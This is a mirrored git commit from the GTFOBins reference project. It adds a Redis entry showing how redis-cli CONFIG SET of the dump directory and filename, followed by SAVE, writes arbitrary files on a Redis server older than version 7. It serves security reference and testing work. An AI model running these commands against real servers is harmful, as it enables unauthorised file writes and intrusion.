mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Adding Redis file write
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
1f52a21411
commit
d1d30414fe
13
_gtfobins/redis.md
Normal file
13
_gtfobins/redis.md
Normal file
@ -0,0 +1,13 @@
|
||||
---
|
||||
description: This works with versions lower than 7.
|
||||
functions:
|
||||
file-write:
|
||||
- description: Write files on the server running Redis at the specified location. Written data will appear amongst the database dump, thus it might not be suitable for all kind of purposes.
|
||||
code: |
|
||||
IP=127.0.0.1
|
||||
redis-cli -h $IP
|
||||
config set dir dir_to_write_to
|
||||
config set dbfilename file_to_write
|
||||
set x "DATA"
|
||||
save
|
||||
---
|
Loading…
Reference in New Issue
Block a user